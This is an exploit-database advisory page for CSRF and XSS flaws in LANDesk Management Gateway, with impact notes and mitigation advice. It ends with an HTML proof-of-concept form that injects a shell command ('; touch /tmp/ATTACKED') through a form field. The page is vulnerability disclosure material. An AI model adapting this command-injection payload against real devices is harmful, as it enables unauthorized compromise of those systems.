header-logo
Suggest Exploit
vendor:
Management Gateway
by:
7.5
CVSS
HIGH
Cross-Site Request Forgery, Cross-Site Scripting
352, 79
CWE
Product Name: Management Gateway
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

LANDesk Management Gateway Cross-Site Request Forgery and Cross-Site Scripting Vulnerabilities

An attacker can exploit the cross-site request forgery issue to alter the settings on affected devices. This may lead to further network-based attacks, including command-injection attacks to the device's underlying operating system, which can lead to a complete compromise of a vulnerable device. The attacker can exploit the cross-site scripting issue to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible.

Mitigation:

Apply the latest security patches provided by the vendor. Implement strong input validation and output encoding to prevent cross-site request forgery and cross-site scripting attacks. Regularly monitor and audit network traffic for suspicious activities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38119/info

LANDesk Management Gateway is prone to a cross-site request-forgery vulnerability and a cross-site scripting vulnerability.

An attacker can exploit the cross-site request forgery issue to alter the settings on affected devices. This may lead to further network-based attacks, including command-injection attacks to the device's underlying operating system, which can lead to a complete compromise of a vulnerable device.

The attacker can exploit the cross-site scripting issue to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible. 

<html> <head><title>LANDesk PoC</title></head> <body> <form method="post" action="https://www.example.com/gsb/datetime.php"> <input type="text" name="delBackupName" value="; touch /tmp/ATTACKED"> <input type="text" name="backupRestoreFormSubmitted" value="b"> <input type="submit" value="Attack!"> </form> </body> </html>